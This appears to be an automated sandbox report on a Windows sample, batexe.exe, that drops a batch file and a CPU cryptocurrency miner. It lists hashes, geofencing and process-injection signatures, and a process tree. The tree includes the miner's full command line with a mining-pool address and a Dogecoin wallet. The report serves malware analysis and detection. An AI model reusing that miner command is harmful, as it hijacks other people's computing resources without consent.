Analysis
max time kernel: 294s
max time network: 297s
platform: windows10-2004_x64
resource: win10v2004-20231222-ja
resource tags: arch:x64, arch:x86, image:win10v2004-20231222-ja, locale:ja-jp, os:windows10-2004-x64, system:windows
submitted: 14/02/2024, 16:26
Behavioral task behavioral1
Sample: batexe.exe
Resource: win10-20231215-ja

Behavioral task behavioral2
Sample: batexe.exe
Resource: win10v2004-20231222-ja
General
Target: batexe.exe
Size: 9.4MB
MD5: cdc9eacffc6d2bf43153815043064427
SHA1: d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256: 73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512: fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP: 196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation | batexe.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation | b2e.exe

Executes dropped EXE (2 IoCs)
pid | Process
5932 | b2e.exe
520 | cpuminer-sse2.exe

Loads dropped DLL (5 IoCs)
pid | Process
520 | cpuminer-sse2.exe (5 identical entries)

resource | yara_rule
behavioral2/memory/3148-9-0x0000000000400000-0x000000000393A000-memory.dmp | upx

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Suspicious use of WriteProcessMemory (8 IoCs)
description | pid | Process | procid_target
PID 3148 wrote to memory of 5932 | 3148 | batexe.exe | 84 (3 identical entries)
PID 5932 wrote to memory of 5624 | 5932 | b2e.exe | 85 (3 identical entries)
PID 5624 wrote to memory of 520 | 5624 | cmd.exe | 88 (2 identical entries)
Processes
1. C:\Users\Admin\AppData\Local\Temp\batexe.exe
   command line: "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
   - Checks computer location settings
   - Suspicious use of WriteProcessMemory
   PID: 3148
   2. C:\Users\Admin\AppData\Local\Temp\9858.tmp\b2e.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\9858.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\9858.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      PID: 5932
      3. C:\Windows\SysWOW64\cmd.exe
         command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9B17.tmp\batchfile.bat" "
         - Suspicious use of WriteProcessMemory
         PID: 5624
         4. C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
            command line: cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
            - Executes dropped EXE
            - Loads dropped DLL
            PID: 520
Network
MITRE ATT&CK Enterprise v15
Downloads